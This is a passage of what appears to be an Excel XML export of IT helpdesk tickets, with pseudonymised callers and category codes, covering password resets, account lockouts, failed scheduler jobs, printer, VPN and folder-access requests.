    <s v="the battery on the display is charging up to 100% and it works._x000d__x000a_the battery with the keybankrd is at 76% - plugged in, not charging._x000d__x000a_he is not sure if he is using the charger for the docking station or the charger supplied with the 2 in 1 device._x000d__x000a_we have swapped the power point, still no go._x000d__x000a__x000d__x000a_updated bios from a08 to a10, still no go._x000d__x000a__x000d__x000a_please advise..._x000d__x000a_"/>
    <s v="nouivdea boiypjvx"/>
    <x v="2"/>
  </r>
  <r>
    <s v="reset the password for tsicojkp kghaozew on windows login"/>
    <s v="this is not resolved per the incident i placed earlier. i need my passwords reset.  please start with windows then i will attempt to update all with password_management_tool."/>
    <s v="tsicojkp kghaozew"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1953b failed in job_scheduler at: 09/06/2016 10:37:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1953b failed in job_scheduler at: 09/06/2016 10:37:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="please reset my password for supply_chain_software."/>
    <s v="please reset my password for supply_chain_software._x000d__x000a_"/>
    <s v="ockwafib wftboqry"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ethics login not recognized"/>
    <s v="ethics login is not being recognized. "/>
    <s v="kslhobgj cyhvefna"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to load outlook "/>
    <s v="unable to load outlook "/>
    <s v="wcrxkiqz zdsloriy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print from the default printer"/>
    <s v="unable to print from the default printer"/>
    <s v="cowsvzel ryhkefwv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for tsicojkp kghaozew using password_management_tool password reset."/>
    <s v="i am locked out of password_management_tool id password manager to sync my passwords and my o365 password is not working. please reset my password."/>
    <s v="tsicojkp kghaozew"/>
    <x v="16"/>
  </r>
  <r>
    <s v="employment status - three new non-employee [enter user's name]"/>
    <s v="*page down to ensure that all required data fields are complete before submitting*_x000a__x000a_use this template for consultants, temps, interns, vendors, etc.                   please complete all entries._x000a_first name rita_x000a_last name baugtymli_x000a_location germany_x000a_manager / sponsor  lkwspqce knxaipyj_x000a_cost center ?_x000a_external company name deloitte &amp; touche_x000a_what systems do they need access on erp SID_34_x000a_mii? no_x000a_         if yes â€“ is user operator, admin or supervisor?_x000a_security note: for mii â€“ add im:shopfloor_user_* to user's SID_34 account_x000a_is company email required for this person ? no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 create SID_34 with it:auditor_v_x000a_requires access until (date)  09/30/2016_x000a_is the computer owned by company no_x000a_     if yes, is it a laptop or desktop ?                      computer name:_x000a_is remote access/vpn required lcitrixerpall_x000a_if yes, please provide to which all applications, erp systems, network servers the user needs access via vpn._x000a_start date 09/01/2016_x000a__x000a_first name maximgbilian_x000a_last name wilsfrtch_x000a_location germany_x000a_manager / sponsor  lkwspqce knxaipyj_x000a_cost center ?_x000a_external company name deloitte &amp; touche_x000a_what systems do they need access on erp SID_34_x000a_mii? no_x000a_         if yes â€“ is user operator, admin or supervisor?_x000a_security note: for mii â€“ add im:shopfloor_user_* to user's SID_34 account_x000a_is company email required for this person ? no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 create SID_34 with it:auditor_v_x000a_requires access until (date)  09/30/2016_x000a_is the computer owned by company no_x000a_     if yes, is it a laptop or desktop ?                      computer name:_x000a_is remote access/vpn required lcitrixerpall_x000a_if yes, please provide to which all applications, erp systems, network servers the user needs access via vpn._x000a_start date 09/01/2016_x000a__x000a__x000a_first name carolutyuin_x000a_last name votgygel_x000a_location germany_x000a_manager / sponsor  lkwspqce knxaipyj_x000a_cost center ?_x000a_external company name deloitte &amp; touche_x000a_what systems do they need access on erp SID_34_x000a_mii? no_x000a_         if yes â€“ is user operator, admin or supervisor?_x000a_security note: for mii â€“ add im:shopfloor_user_* to user's SID_34 account_x000a_is company email required for this person ? no_x000a_     if yes, by default a k1 license will be assigned for use of owa and collaboration_platform only, not outlook client, or skype._x000a_     if outlook client or skype, are required, a more costly e1 license must be assigned, and can be used only on a company computer._x000a_     assign a k1 or e1 license?     _x000a_access like who  (required â€“ this is to review copy-from person's access for approvals) create SID_34 with it:auditor_v_x000a_requires access until (date)  09/30/2016_x000a_is the computer owned by company no_x000a_     if yes, is it a laptop or desktop ?                      computer name:_x000a_is remote access/vpn required lcitrixerpall_x000a_if yes, please provide to which all applications, erp systems, network servers the user needs access via vpn._x000a_start date 09/01/2016"/>
    <s v="lbqgystk uezmfhsn"/>
    <x v="19"/>
  </r>
  <r>
    <s v="need account adding to my crm "/>
    <s v="_x000a__x000a_received from: zfburidj.jmilguev@gmail.com_x000a__x000a_hi there,_x000a__x000a_can you please add the following account to my crm. it is one of my assigned accounts but i cannot see it._x000a__x000a_account name - pow578ercor_x000a_erp # - 8185636495_x000a__x000a_"/>
    <s v="zfburidj jmilguev"/>
    <x v="39"/>
  </r>
  <r>
    <s v="install zebra \we_wu101 \pfjwinbg ljtzbdqg"/>
    <s v="install zebra \we_wu101 \pfjwinbg ljtzbdqg"/>
    <s v="pfjwinbg ljtzbdqg"/>
    <x v="24"/>
  </r>
  <r>
    <s v="organisation chart data in outlook"/>
    <s v="dear it team , _x000d__x000a__x000d__x000a_pl look into below screen shot omfvxjpw htiemzsg is appearing in outlook in my org chart , pl remove the same . _x000d__x000a__x000d__x000a_"/>
    <s v="thevrxbo makhtjcu"/>
    <x v="19"/>
  </r>
  <r>
    <s v="travelers"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qcfmxgid.jvxanwre@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a__x000d__x000a_i have two more travel profiles.  please see attached/._x000d__x000a__x000d__x000a_best "/>
    <s v="qcfmxgid jvxanwre"/>
    <x v="0"/>
  </r>
  <r>
    <s v="master cost center missing for a person number 11177056737 "/>
    <s v="master cost center missing for a person number 11567177037 - _x000a_cost center should be ltu017"/>
    <s v="sclfndob gnibctwu"/>
    <x v="51"/>
  </r>
  <r>
    <s v="mismatch   between  plant_63  &amp;  erp inventrory "/>
    <s v="_x000d__x000a__x000d__x000a_received from: ikerxqwz.prkyuitl@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_every month we see difference   in quantity   in inventory  between  plant_63  stocks  &amp; erp   stocks   ._x000d__x000a__x000d__x000a_our assumption was that  in  erp  we inward   stock without paper (customer return  with- out paper but good for resale ) , but it is not so._x000d__x000a__x000d__x000a_in this connection  attaching the  extraction of plant_63 register  as on 31.8.16 , erp inventory (plant_63)  and   workings which show difference between_x000d__x000a_ erp &amp; plant_63   register_x000d__x000a__x000d__x000a_i have highlighted   few material  code  in red color which is the difference between    erp &amp; plant_63   and   throws light   that inward   is made with paper  also  downloaded  screen shot of 2 material  code for your reference_x000d__x000a__x000d__x000a_request you to  investigate  and   revert  with reasons for such difference   ._x000d__x000a__x000d__x000a_this is time bound activity  and we expect this to be closed by sept 25  , 2016   as the same needs to  informed to the auditor  for  sept 30,2016 ._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ikerxqwz prkyuitl"/>
    <x v="17"/>
  </r>
  <r>
    <s v=" infopath issue - some rules were not applied"/>
    <s v=" infopath issue - some rules were not applied_x000a_"/>
    <s v="zidbmyut esmbcxor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage: circuit outage: company vpn circuit is down at 8:25 am et on 09/06. site is up on primary circuit"/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____slo site_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______8:25 am et on 09/06________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? __no_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unable to log in to erp SID_34 "/>
    <s v="unable to log in to erp SID_34 "/>
    <s v="jtaronux xvurkcbi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request it loaner laptop; need on _09_ - _06_ - _2016_"/>
    <s v="** loaners laptops are currently only available for usa employees in usa, pa (hq) and usa employees in usa, ar . we apologize for the inconvenience. **_x000d__x000a__x000d__x000a_need laptop on _09_ - _06_ - _2016_ (3 days notice is required for a loaner to be ready; laptops can be reserved no more than 2 weeks in advance)._x000d__x000a__x000d__x000a_will return laptop on 09_ - _07_ - _2016(laptops can be borrowed for a maximum of 3 weeks)._x000d__x000a__x000d__x000a_does user need remote access (vpn) ? no_x000d__x000a_if yes, who is the requester's manager (approval needed) ?_x000d__x000a__x000d__x000a_laptop comes with erp, vpn, etc._x000d__x000a__x000d__x000a_additional software needed?:  _x000d__x000a__x000d__x000a_ office 2000 (word, excel, powerpoint) y/n? _____x000d__x000a_ outlook y/n? _____x000d__x000a__x000d__x000a_the following will be updated by it:_x000d__x000a__x000d__x000a_dell serial number = _x000d__x000a_company asset tag = _x000d__x000a__x000d__x000a_note: if the laptop and all parts are not returned as scheduled, the requestor's department will be charged replacement cost's."/>
    <s v="ncksqfmz fzcjunai"/>
    <x v="2"/>
  </r>
  <r>
    <s v="help with mobile phones"/>
    <s v="_x000d__x000a__x000d__x000a_received from: mfizgpoy.akbvznci@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a__x000d__x000a_i'm having issues with my company phone and i am not sure who to contact to help me correct the issue. can i please get the contact that can help me solve this problem?_x000d__x000a__x000d__x000a_"/>
    <s v="mfizgpoy akbvznci"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print. requesting for printer drivers."/>
    <s v="unable to print. requesting for printer drivers."/>
    <s v="kauozcir jlyqxise"/>
    <x v="0"/>
  </r>
  <r>
    <s v="impact award password reset"/>
    <s v="impact award password reset"/>
    <s v="jlpmakzb encpjsxq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hotwlygp afukzhnm - frequent account lockout"/>
    <s v="account keeps locking out after the last password change,"/>
    <s v="hotwlygp afukzhnm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business_client - a plug-in is not responding"/>
    <s v="i need to view attachments in er2248695, but i get an error &quot;a plug-in is not responding&quot; and i cannot see the attachments.  without seeing the attachments, i do not know what changes to make to the drawings and the parts are on hold in manufacturing._x000d__x000a_"/>
    <s v="irpvzhym kayqlbuh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="qfcxbpht oiykfzlr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="cplwfdjk djtriwby"/>
    <x v="0"/>
  </r>
  <r>
    <s v="fc on departments\distribution"/>
    <s v="moin marfhtyio,_x000d__x000a__x000d__x000a_kannst du bitte herr lzuwmhpr riuheqsg fÃ¼r das laufwerk departments (\\HostName_717), distribution, formulare zulassen. danke! _x000d__x000a__x000d__x000a__x000d__x000a_kind "/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="11"/>
  </r>
  <r>
    <s v="probleme mit we95\ drucker druckt nicht \dknejifu dljvtebc"/>
    <s v="probleme mit we95\ drucker druckt nicht \dknejifu dljvtebc"/>
    <s v="dknejifu dljvtebc"/>
    <x v="24"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="pyeothbl agfxelwz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="ujsyzrvw vjuyzcih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for ugawcoye jcfqgviy using password_management_tool password reset."/>
    <s v="the"/>
    <s v="ugawcoye jcfqgviy"/>
    <x v="16"/>
  </r>
  <r>
    <s v="tastatutur defekt \eewhse \vzqomdgt jwoqbuml"/>
    <s v="tastatutur defekt \eewhse \vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="install EU_tool und zebra \ewew8323506 \zlqfptjx xnklbfua"/>
    <s v="install EU_tool und zebra \ewew8323506 \zlqfptjx xnklbfua"/>
    <s v="zlqfptjx xnklbfua"/>
    <x v="24"/>
  </r>
  <r>
    <s v="dock station - required "/>
    <s v="_x000a__x000a_received from: jmoqelbc.fbzsyjne@gmail.com_x000a__x000a_hello team,_x000a__x000a_can you please arrange a dock station for my laptop model â€“ latitude e5450, please let me know if you required further details._x000a__x000a_br,aghynil_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="jmoqelbc fbzsyjne"/>
    <x v="18"/>
  </r>
  <r>
    <s v="erp access issue bex hana"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_37_x000d__x000a__x000d__x000a_enter user id of user having the issue: dofghbmes_x000d__x000a__x000d__x000a_transaction code(s) the user needs or was working with: bex_x000d__x000a__x000d__x000a_describe the issue: _x000d__x000a__x000d__x000a_password logon no longer possible - too many failed attempts_x000d__x000a__x000d__x000a_provide access the same as this other user:"/>
    <s v="lmwohkbd ucziatex"/>
    <x v="19"/>
  </r>
  <r>
    <s v="issues with the computer - error messages / not enough space "/>
    <s v="issues with the computer. the user can't work. there are regular error messages regarding not enough space on the computer._x000a_the files on the hard drive have been cleaned up, but the problem did not dierppear.  _x000a_user: effeghnk_x000a_computer name: efdw8111210_x000a_please see the attached screenshots with error messages._x000a_the user tried contacting the it help via it chat support, but it did not work on this computer probably due to recent issues._x000a_for further questions, please contact mizpywld dnrubpis at the tel.  or via sky business._x000a__x000a_"/>
    <s v="mizpywld dnrubpis"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for imuwhokc ijdfnayb using password_management_tool password reset."/>
    <s v="i reset my password tonight and already forgot it. i can't log on to anything. "/>
    <s v="pdvjanwx oprdiygs"/>
    <x v="16"/>
  </r>
  <r>
    <s v="bobj - erp business objects"/>
    <s v="_x000a__x000a_received from: ctzykflo.evzbhgru@gmail.com_x000a__x000a_dear all,_x000a__x000a_can someone please check ._x000a__x000a_we do have some new sales employees but the name doesn't show in the &quot;sales plan vs actual&quot; bobj report._x000a__x000a_we have f.ex. #_x000a__x000a__x000a_Â·        1044565291 = mjvfxnka zvjxuahe and_x000a__x000a_Â·        1044535680 = wohzmlib fxwjhapo._x000a__x000a_can someone please check and let us know when we will also see the names of the sales people._x000a__x000a_is there no automatic routine ?_x000a__x000a_[cid:image001.jpg@01d2082c.9c01e9c0]_x000a__x000a__x000a_[cid:image002.jpg@01d2082c.9c01e9c0]_x000a__x000a_"/>
    <s v="ctzykflo evzbhgru"/>
    <x v="8"/>
  </r>
  <r>
    <s v="laptop login issue _kxmidsga zokivdfa"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kxmidsga.zokivdfa@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a_i am facing issue with login into laptop while starting_x000d__x000a__x000d__x000a_the below window is coming (screen shot attached). due to this i am not able to login when i am using laptop as an pad. keybankrd is not showing. so every time i have to connect it with keybankrd to enter user id &amp; password._x000d__x000a_laptop model:  dell latitude 7350_x000d__x000a__x000d__x000a_[cid:image001.jpg@01d20849.f8d3a360]_x000d__x000a__x000d__x000a_request you to kindly solve the problem._x000d__x000a__x000d__x000a_best "/>
    <s v="kxmidsga zokivdfa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit outlook \axesnghb cyzuomxa"/>
    <s v="probleme mit outlook \axesnghb cyzuomxa"/>
    <s v="axesnghb cyzuomxa"/>
    <x v="24"/>
  </r>
  <r>
    <s v="visual studio 2015 license issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rmezbnqt.ntbmkpuh@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a_                visual studio professional 2015 in my machine has a license issue, warning message indicates license trial has been expired._x000d__x000a__x000d__x000a_                but the coverage period for the existing vs2015 license is till 30nov2018._x000d__x000a__x000d__x000a_                please refer to the attached image for the error description and license validity details._x000d__x000a__x000d__x000a_"/>
    <s v="rmezbnqt ntbmkpuh"/>
    <x v="18"/>
  </r>
  <r>
    <s v="unable to send/receive emails from external parties - eonhuwlg sxthcobm, wydorpzi taxcizwv, praddgtip kumfgtyar"/>
    <s v="_x000a__x000a_received from: izwtdnfq.xptuoaid@gmail.com_x000a__x000a_hi it team,_x000a__x000a_eonhuwlg sxthcobm cannot receive and send any emails to the external parties via his company email address. however, his colleague, wydorpzi taxcizwv wydorpzi.taxcizwv@gmail.com&lt;mailto:wydorpzi.taxcizwv@gmail.com&gt; can send and receive emails with no any issues._x000a__x000a_kindly investigate the issue for debaghjsish and you can take sagar user to compare for the difference._x000a__x000a_fyi, both of them are our fi outsource from partner and also got company email address in the same for fi operation support to us._x000a__x000a_appreciate if you could prioritise to fix for us. "/>
    <s v="izwtdnfq xptuoaid"/>
    <x v="26"/>
  </r>
  <r>
    <s v="lese- / schreibberechtigung fÃ¼r m:\kbt-auftrgasbearb"/>
    <s v="hallo marfhtyio,_x000d__x000a__x000d__x000a_bitte richte mir die lese- / schreibberechtigung fÃ¼r m:\kbt-auftrgasbearb ein._x000d__x000a__x000d__x000a_danke  anfghyudrejy_x000d__x000a__x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a_freundliche grÃ¼ÃŸe / kind "/>
    <s v="htvepyua izgulrcf"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job Job_2645 failed in job_scheduler at: 09/06/2016 03:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2645 failed in job_scheduler at: 09/06/2016 03:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="please review  EU_tool  server in germany - HostName_755 - EU_tool is not working - very urgent"/>
    <s v="please review  EU_tool  server in germany - HostName_755 - EU_tool is not working - very urgent"/>
    <s v="xmysiufa emfdltqz"/>
    <x v="25"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="dwafrmth oabwzitv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for pyeothbl agfxelwz using password_management_tool password reset."/>
    <s v="reset passwords for pyeothbl agfxelwz using password_management_tool password reset."/>
    <s v="pyeothbl agfxelwz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_53:volume: f:\ label:dat2-HostName_53 d4e35b72 on server is over 95% space consumed. space available:  996.0 kb"/>
    <s v="HostName_53: f drive is 100% full."/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="11"/>
  </r>
  <r>
    <s v="reset passwords for pyeothbl agfxelwz using password_management_tool password reset."/>
    <s v="please reset password aerp _x000d__x000a_"/>
    <s v="pyeothbl agfxelwz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account password is expired "/>
    <s v="account is expired "/>
    <s v="moeyphif zfweijcb"/>
    <x v="31"/>
  </r>
  <r>
    <s v="job que processor for engg database stopped, please restart"/>
    <s v="to the database team:_x000d__x000a_the job processor for the engg production system has stopped, please restart._x000d__x000a_"/>
    <s v="dmqxwkfr olmwqzpu"/>
    <x v="57"/>
  </r>
  <r>
    <s v="reset microsoft online services password"/>
    <s v="from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] _x000a_sent: tuesday, september 06, 2016 11:38 am_x000a_to: nwfodmhc exurcwkm_x000a_cc: tiyhum kuyiomar_x000a_subject: rad:request to reset microsoft online services password for rmezbnqt.ntbmkpuh@gmail.com_x000a_importance: high_x000a__x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ rmezbnqt.ntbmkpuh@gmail.com _x000a_â€¢ first name: nihktgsh kurtyar  _x000a_â€¢ last name: kaghjtra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rmezbnqt ntbmkpuh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to access SID_1"/>
    <s v="_x000a__x000a_received from: miecoszw.mhvbnodw@gmail.com_x000a__x000a_hi,_x000a__x000a_not able to access SID_1 system_x000a_user id- heghjyder_x000a__x000a__x000a_gajthyana hegdergyt_x000a_manager- finance_x000a_miecoszw.mhvbnodw@gmail.com&lt;mailto:miecoszw.mhvbnodw@gmail.com&gt;_x000a__x000a_"/>
    <s v="miecoszw mhvbnodw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for guldiwmn aroqwuvz on erp / production / erp"/>
    <s v="i cannot log or change my erp password. ploease help."/>
    <s v="guldiwmn aroqwuvz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1346 failed in job_scheduler at: 09/06/2016 02:03:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1346 failed in job_scheduler at: 09/06/2016 02:03:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="vpn connection failure"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xwertljy.zrmlhkyq@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am not able to connect to vpn._x000d__x000a__x000d__x000a_"/>
    <s v="xwertljy zrmlhkyq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="&quot;\\HostName_625\departments\ehs_arbeitsmedizin&quot;: bitte den verantwortlichen Ã¤ndern von metghyjznk auf roedfghtec"/>
    <s v="bitte den verantwortlichen des ordners &quot;\\HostName_625\departments\ehs_arbeitsmedizin&quot; Ã¤ndern von ozphysqw pgcmwqze (metghyjznk) auf clara rÃ¶der (roedfghtec) ... danke!_x000a__x000a_please change the owner of this folder to vhebydgs rtmjwyvk (roedfghtec)"/>
    <s v="ozphysqw pgcmwqze"/>
    <x v="33"/>
  </r>
  <r>
    <s v="not able to login to system wh my user id and details on new hardware replaced "/>
    <s v="computer name  : aiml7801004"/>
    <s v="mcphgvnb bdegqtyj"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job Job_1343 failed in job_scheduler at: 09/06/2016 01:13:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1343 failed in job_scheduler at: 09/06/2016 01:13:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="åˆ é™¤äº†ä¸€ä¸ªexcel æ–‡æ¡£ï¼Œæ–‡æ¡£åœ°å€ï¼š\\HostName_17\teams\business\c2 qualitycontrol\c25 quality project\c251 k100\weekly layered process audi"/>
    <s v="åˆ é™¤äº†ä¸€ä¸ªexcel æ–‡æ¡£ï¼Œ&quot;kmfg0042f01r00---lpa countermeasures ï¼ˆfy17 total),æ–‡æ¡£åœ°å€ï¼š\\HostName_17\teams\business\c2 qualitycontrol\c25 quality project\c251 k100\weekly layered process audit\fy17"/>
    <s v="rjxbiplo jmhnleaq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="virus scanned"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pxbqkfgm.qexvrmcn@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_pls. do the needful._x000d__x000a__x000d__x000a_[cid:image003.jpg@01d20828.8bd3bff0]_x000d__x000a__x000d__x000a_vivthyek byuihand_x000d__x000a_asst manager- sales_x000d__x000a_company india ltd, india._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="pxbqkfgm qexvrmcn"/>
    <x v="49"/>
  </r>
  <r>
    <s v="unable to connect to company wi-fi "/>
    <s v="unable to connect to company wi-fi "/>
    <s v="ntuhoafg bzwefjvk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="attendance_tool id and password."/>
    <s v="_x000d__x000a__x000d__x000a_received from: ojgfmvep.zbatowgi@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_need help as i forgot my attendance_tool login id and password._x000d__x000a__x000d__x000a_with best "/>
    <s v="ojgfmvep zbatowgi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out and password reset "/>
    <s v="account locked out and password reset "/>
    <s v="qklrdoba qxivmbts"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to add id01 as printer in my laptop"/>
    <s v="not able to add id01 as printer in my laptop. after installing driver, system throws up an error - can't add printer."/>
    <s v="upfthmjx fdxrpqat"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job Job_2110 failed in job_scheduler at: 09/06/2016 00:05:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2110 failed in job_scheduler at: 09/06/2016 00:05:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="ctrl, alt and delete keys are not working "/>
    <s v="ctrl ,alt and delete keys are not working_x000a_unable  to login to pc _x000a_dell latitude 6420_x000a_contact no _x000a__x000a__x000a_assisted user click on easy to access option_x000a_and enable type without key bankrd option_x000a_with help of cursor click on control ,alt and delete (no go)_x000a_delete button is not working _x000a__x000a_"/>
    <s v="cjklxmhi hmrkzbxu"/>
    <x v="18"/>
  </r>
  <r>
    <s v="serious issue with transports in SID_37"/>
    <s v="we observed that request SID_35k910228 was imported with warnings on 24th june has been re-imported twice on 16th july and 3rd sep. can you please check and share the details of why this is happening?_x000d__x000a__x000d__x000a_this is a serious issue as this request is trying to over-write the changes that were done post this transport._x000d__x000a_"/>
    <s v="petgvwch zevpkogu"/>
    <x v="13"/>
  </r>
  <r>
    <s v="reset microsoft online services password for jhyazros.azdxonjg@gmail.com"/>
    <s v="from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] _x000a_sent: tuesday, september 06, 2016 8:54 am_x000a_to: nwfodmhc exurcwkm_x000a_cc: tiyhum kuyiomar_x000a_subject: rad:request to reset microsoft online services password for jhyazros.azdxonjg@gmail.com_x000a_importance: high_x000a__x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ jhyazros.azdxonjg@gmail.com _x000a_â€¢ first name: venfgugjhytpal _x000a_â€¢ last name: nythug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jhyazros azdxonjg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 kis error"/>
    <s v="_x000a__x000a_received from: pkdavqwt.tafrmxsh@gmail.com_x000a__x000a_hello it team,_x000a_dn 9168066866 was processed in erp kis, but its kis record was missed. its sf tracking number is 60666560449820._x000a_could you find the cause and fix it?_x000a_"/>
    <s v="pkdavqwt tafrmxsh"/>
    <x v="17"/>
  </r>
  <r>
    <s v="folder access request."/>
    <s v="_x000d__x000a__x000d__x000a_received from: sepbdtou.noredzyx@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please help to provide access to HostName_64\departments as follows:_x000d__x000a_p:\financemssg-apac\partner\ctc_x000d__x000a_person to access:_x000d__x000a_lxkecjgr fwknxupq : lxkecjgr.fwknxupq@gmail.com&lt;mailto:lxkecjgr.fwknxupq@gmail.com&gt;_x000d__x000a_fjzywdpg vkdobexr : fjzywdpg.vkdobexr@gmail.com&lt;mailto:fjzywdpg.vkdobexr@gmail.com&gt;_x000d__x000a_tnorudbf lauftqmd: tnorudbf.lauftqmd@gmail.com_x000d__x000a__x000d__x000a_p:\financemssg-apac\partner\rtr_x000d__x000a_person to access:_x000d__x000a_qcjevayr xirwgjks: qcjevayr.xirwgjks@gmail.com&lt;mailto:qcjevayr.xirwgjks@gmail.com&gt;_x000d__x000a_nil madhaw rai: hkjfmcqo.gpcxltar@gmail.com&lt;mailto:hkjfmcqo.gpcxltar@gmail.com&gt;_x000d__x000a_uyocgasl ogabwxzv: uyocgasl.ogabwxzv@gmail.com&lt;mailto:uyocgasl.ogabwxzv@gmail.com&gt;_x000d__x000a_nfdtriwx lriupqct: nfdtriwx.lriupqct@gmail.com&lt;mailto:nfdtriwx.lriupqct@gmail.com&gt;_x000d__x000a__x000d__x000a_level of access: full control_x000d__x000a__x000d__x000a_"/>
    <s v="sepbdtou noredzyx"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to login windows"/>
    <s v="unable to login windows"/>
    <s v="cjklxmhi hmrkzbxu"/>
    <x v="18"/>
  </r>
  <r>
    <s v="system is not booting up"/>
    <s v="system is not booting up"/>
    <s v="vkezwolt fgnqzeai"/>
    <x v="18"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="cjklxmhi hmrkzbxu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to receive mail from bank of amerirtca (cash pro online)"/>
    <s v="i have raised a request for access in the bank portal but i cannot receive mail from them._x000d__x000a_kindly assist."/>
    <s v="hkjfmcqo gpcxltar"/>
    <x v="26"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="urevbjcp krcaylpz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out and password reset "/>
    <s v="account locked out and password reset "/>
    <s v="tcbonyes gpfacron"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2555 failed in job_scheduler at: 09/05/2016 22:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2555 failed in job_scheduler at: 09/05/2016 22:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="can not serch my engineering_tool"/>
    <s v="hello_x000d__x000a_i can not serch for my engineering_tool if i specify the date._x000d__x000a_the error on the bottom of the window shows that i do not have the access to it._x000d__x000a_please give me the access._x000d__x000a_"/>
    <s v="cuytdmhv yeqdmwvt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="gtehdnyu belt tracker"/>
